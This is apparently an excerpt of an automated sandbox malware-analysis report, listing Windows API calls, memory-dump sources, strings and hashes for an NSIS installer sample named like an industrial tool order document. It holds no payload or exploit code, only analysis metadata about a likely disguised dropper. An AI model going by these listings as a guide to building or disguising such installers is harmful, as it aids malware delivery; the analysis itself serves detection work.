                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040532C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405368
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405378
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040537E
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405387
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405391
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A5
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053BE
                                                                                                                                                                                                                          • SetClipboardData.USER32(?,00000000), ref: 004053C9
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004053CF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 590372296-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A4B
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403A68
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403A7C
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A98
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403AB9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ACD
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403AD4
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403B82
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403B8C
                                                                                                                                                                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA6
                                                                                                                                                                                                                          • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403BF7
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403C9D
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403CBE
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403CD0
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403CEB
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403D01
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403D08
                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403D20
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D33
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0041FD20,?,0041FD20,00422F20), ref: 00403D5C
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,0041FD20), ref: 00403D6B
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403E9F
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 184305955-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004040B6
                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040CA
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004040E8
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004040F9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404108
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404117
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040411A
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404129
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413E
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041A0
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 004041A3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041CE
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040421D
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404226
                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,?), ref: 00404239
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404246
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404249
                                                                                                                                                                                                                          • SendMessageA.USER32(00000111,?,00000000), ref: 00404275
                                                                                                                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404289
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                          • String ID: N$open
                                                                                                                                                                                                                          • API String ID: 3615053054-904208323
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A000,0041FD20,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD20,00000000,00000002,766B3410,0042A400,00429000,00000000), ref: 004036F8
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(004226C0,?,?,?,004226C0,00000000,00429400,0042A000,0041FD20,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD20,00000000,00000002,766B3410), ref: 0040376D
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403780
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(004226C0), ref: 0040378B
                                                                                                                                                                                                                          • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00429400), ref: 004037D4
                                                                                                                                                                                                                            • Part of subcall function 00405C5B: wsprintfA.USER32 ref: 00405C68
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 00403811
                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403829
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385E
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403894
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 004038C0
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 004038CD
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 004038D6
                                                                                                                                                                                                                          • DialogBoxParamA.USER32(?,00000000,00403A0F,00000000), ref: 004038F5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00421AB0,NUL,?,00000000,?,00000000,00405BD9,?,?), ref: 00405A55
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405BD9,?,?), ref: 00405A79
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(?,00421AB0,00000400), ref: 00405A82
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(00421EB0,00421EB0,00000400), ref: 00405A9F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405ABD
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00421EB0,C0000000,00000004,00421EB0,?,?,?,?,?), ref: 00405AF8
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B07
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3F
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216B0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405B95
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BA6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BAD
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNEL32(00000003,00402CA6,0042AC00,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040436F
                                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404399
                                                                                                                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F0F8,?), ref: 0040444A
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404455
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(004226C0,0041FD20), ref: 00404487
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,004226C0), ref: 00404493
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A5
                                                                                                                                                                                                                            • Part of subcall function 004054D7: GetDlgItemTextA.USER32(?,?,00000400,004044DC), ref: 004054EA
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,*?|<>/":,00000000,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FC0
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FD2
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharPrevA.USER32(?,?,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041ECF0,?,?,0000040F,?,0041ECF0,0041ECF0,?,?,0041ECF0,?,?,000003FB,?), ref: 00404563
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457E
                                                                                                                                                                                                                            • Part of subcall function 004046D7: lstrlenA.KERNEL32(0041FD20,0041FD20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                            • Part of subcall function 004046D7: wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                            • Part of subcall function 004046D7: SetDlgItemTextA.USER32(?,0041FD20), ref: 00404790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                          • API String ID: 2624150263-3554254475
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402C93
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNEL32(00000003,00402CA6,0042AC00,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CDF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • soft, xrefs: 00402D54
                                                                                                                                                                                                                          • hA, xrefs: 00402CF4
                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                                                                                                                                          • Null, xrefs: 00402D5D
                                                                                                                                                                                                                          • Inst, xrefs: 00402D4B
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00402CB6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$hA
                                                                                                                                                                                                                          • API String ID: 4283519449-1344412290
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersion.KERNEL32(?,0041F500,00000000,00404F4E,0041F500,00000000), ref: 00405DD0
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(004226C0,00000400), ref: 00405E4B
                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(004226C0,00000400), ref: 00405E5E
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405E9A
                                                                                                                                                                                                                          • SHGetPathFromIDListA.SHELL32(?,004226C0), ref: 00405EA8
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00405EB3
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(004226C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED5
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(004226C0,?,0041F500,00000000,00404F4E,0041F500,00000000), ref: 00405F27
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405ECF
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E1A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          • API String ID: 900638850-730719616
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F66
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403F82
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403F8E
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403F9A
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403FAD
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403FBD
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403FD7
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403FE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00402FCF,0041F500,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0041F500,00402FCF,00402FCF,0041F500,00000000,?,00000000), ref: 00404F72
                                                                                                                                                                                                                          • SetWindowTextA.USER32(0041F500,0041F500), ref: 00404F84
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                                          • Opcode ID: aa2ca8cd0db6689708325d6dbeadb1493f1866e87c71ac70f58748d5e232fe27
                                                                                                                                                                                                                          • Instruction ID: eca0c9fc351864773e3873b1aaef0297ce596284c077fb9535b250fc548d2f5f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa2ca8cd0db6689708325d6dbeadb1493f1866e87c71ac70f58748d5e232fe27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D219DB1900119BBDF119FA5CD849DEBFB9EF44354F14807AFA04B6290C7798A41CBA8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047FC
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404804
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0040481E
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404830
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404856
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                                                                                                                                                                                          • Instruction ID: 4b27695e280e242887da12c7cc5754773637cab379b52992c14d440b6ab19931
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C018C76D00218BADB00EB94DC81BEFBBBCAB55711F10412BBA10B62C0C2B4A9018BA5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B9A
